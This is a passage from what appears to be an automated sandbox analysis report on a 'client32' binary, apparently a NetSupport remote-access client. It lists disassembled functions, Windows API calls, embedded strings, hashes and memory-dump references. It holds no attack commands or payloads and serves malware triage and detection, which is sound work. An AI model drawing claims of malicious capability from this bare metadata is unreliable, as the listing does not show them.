                                                                              • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                              • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                              • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
                                                                              Function 110774D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 11077511
                                                                              • CopyRect.USER32(?,00000004), ref: 1107753F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
                                                                              • m_hWnd, xrefs: 110774FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2755825785-2830328467
                                                                              • Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                              • Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
                                                                              • Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
                                                                              • Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98
                                                                              Function 110D12E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 110D1378
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                              • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                              • API String ID: 1528188558-323366856
                                                                              • Opcode ID: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                              • Instruction ID: ca0f400cc3ae87bce4a96c7d882a21a9a029a19775e55ac1937322abd3584148
                                                                              • Opcode Fuzzy Hash: 178f97a59f0bec0598d483463499a2975e296ab7c3110b068437bcfd80d62d5f
                                                                              • Instruction Fuzzy Hash: 0C212639B007566BDB01CF99EC90F9AF3E5AFD1288F048469E99997701EE31F4058398
                                                                              Function 110896B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,0000000E), ref: 11160E88
                                                                                • Part of subcall function 11160D17: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 11160D4F
                                                                                • Part of subcall function 11160D17: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 11160D90
                                                                                • Part of subcall function 11160D17: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 11160DB4
                                                                                • Part of subcall function 11160D17: RegCloseKey.ADVAPI32(?), ref: 11160DE1
                                                                              • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 11160E4A
                                                                              • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 11160E60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                              • String ID: hhctrl.ocx
                                                                              • API String ID: 1060647816-2298675154
                                                                              • Opcode ID: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                              • Instruction ID: 29a85e5adb823bcef9c03dae075ae2b4ea3bdd8fdf15b4c5e271eae4de8d38be
                                                                              • Opcode Fuzzy Hash: 1515c5a980bb63e1af7bf7099e432547b006d5e2aeed3d9808fec87a56ded119
                                                                              • Instruction Fuzzy Hash: DF118E7170423A9BDB05CFA9CD90AAAF7BCEB4C708B00047DE511D3244EBB2E958CB50
                                                                              Function 11005940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 11005981
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110059BC
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessReleasewsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 3704029381-2830328467
                                                                              • Opcode ID: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                              • Instruction ID: 1cf781a21872bd9441bcd9bb2c78fcf7fe1041f1c585c9da4a5e29128da7e192
                                                                              • Opcode Fuzzy Hash: c633f50c0fdfeb7c59634bf7decd603260c8dc5fded95eba86501058678fa527
                                                                              • Instruction Fuzzy Hash: 8C21E475A00705AFE710CB61C880BEBB7E4BF8A358F10407DE5AA4B240DB72A440CBA1
                                                                              Function 1105D500 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103FE35,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105D51E
                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,EE49F673), ref: 1105D59E
                                                                              • SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,EE49F673), ref: 1105D5A8
                                                                              Strings
                                                                              • Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d, xrefs: 1105D561
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterEventLeave
                                                                              • String ID: Thumbnails: mon=%d, w=%d, h=%d, c=%d, interval=%d
                                                                              • API String ID: 3094578987-11999416
                                                                              • Opcode ID: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                              • Instruction ID: cd8e2c595cb3ca955c0a05eca4a83294a9fb2b4bfc4f95d4b2967c0930ade923
                                                                              • Opcode Fuzzy Hash: c530e27155f7b3fdc2e9ca538483d963ca7dcdd1017b1d5184d653da29544702
                                                                              • Instruction Fuzzy Hash: 6D2149B4500B65AFD364CF6AC490967FBF4FF88718700891EE5AA82B41E375F850CBA0
                                                                              Function 110B9680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B969F
                                                                              • MoveWindow.USER32(8D111949,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA885), ref: 110B96D8
                                                                              • SetTimer.USER32(8D111949,0000050D,000007D0,00000000), ref: 110B9710
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoMoveParametersSystemTimerWindow
                                                                              • String ID: Max
                                                                              • API String ID: 1521622399-2772132969
                                                                              • Opcode ID: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                              • Instruction ID: 87ccea237e2aa79ae125a3322bdb2c24729383307459d143463b3682e3a222a8
                                                                              • Opcode Fuzzy Hash: ec225463a539bc69afd1be9fe60c0d6d77afb2bfb6e5901e1a463c37379c6f26
                                                                              • Instruction Fuzzy Hash: A2213DB5A40309AFD714DFA4C885FAFF7B8EB48710F10452EE96597380CB70A941CBA0
                                                                              Function 11153570 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 111535AC
                                                                              • _memmove.LIBCMT ref: 111535E6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memmove$ErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\WCUNPACK.C$n > 128
                                                                              • API String ID: 6605023-1396654219
                                                                              • Opcode ID: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                              • Instruction ID: 7dc9b17917a05d0a1a20c6fa4ac0eb705d74e08118df21bf74e35568faeb592c
                                                                              • Opcode Fuzzy Hash: ec23489f07850d0f282c208d07d7e8fee0db15ceed7262bb29d1eb7273dc92e2
                                                                              • Instruction Fuzzy Hash: 0A1125B6C3916577C3818E6A9D85A9BFB68BB4236CF048115FCB817241E771A614C7E0
                                                                              Function 110395A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(00000000,00000001), ref: 110395E6
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 110395EE
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                              • API String ID: 1136984157-1986719024
                                                                              • Opcode ID: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                              • Instruction ID: 55b3f6273447a840922a2276b3415970a39c2bc3f54fc53508d86eb1e8118ba0
                                                                              • Opcode Fuzzy Hash: 9301bb4a703dc9f718e6a03bc63426bc399485c21c7871a03d02741ec2ccad78
                                                                              • Instruction Fuzzy Hash: C3F0C876640219BFD710CE55DCC6F9BB39CEB88754F108425F61597280D6B1E84087A4
                                                                              Function 11015400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 110AB01D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
                                                                              • API String ID: 819365019-2727927828
                                                                              • Opcode ID: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                              • Instruction ID: c68bebcfb275c132091ba8ffe4505af5196cb7164de974b36e44453814cc3cc0
                                                                              • Opcode Fuzzy Hash: c3e408aabb13ed10315d2f66f65a18e8b557ea6d9dc316695097963d23eb025b
                                                                              • Instruction Fuzzy Hash: 4DF02B34FC0720AFD720D581EC42FCAB3D4AB05709F004469F5562A2D1E5B0B8C0C7D1
                                                                              Function 110ED470 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 110ED498
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
